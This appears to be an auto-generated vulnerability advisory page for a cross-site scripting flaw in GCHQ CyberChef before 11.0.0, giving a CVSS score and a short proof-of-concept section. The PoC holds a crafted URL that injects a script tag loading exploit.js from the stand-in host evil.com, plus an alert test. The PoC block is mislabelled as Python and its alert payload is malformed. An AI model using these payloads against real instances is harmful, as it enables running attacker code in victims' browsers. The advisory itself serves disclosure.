GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated by the /#recipe=Show_Base64_offsets('%3Cscript substring.
CVSS Details
CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
GCHQ CyberChef < 11.0.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC URL generated based on vulnerability description
// Access the vulnerable CyberChef instance with the following URL:
// https://[target]/#recipe=Show_Base64_offsets('%3Cscript%20src%3Dhttp%3A%2F%2Fevil.com%2Fexploit.js%3E%3C%2Fscript%3E')
// Alternative simple alert test:
// https://[target]/#recipe=Show_Base64_offsets('%3Cscript%20alert(1)%3E')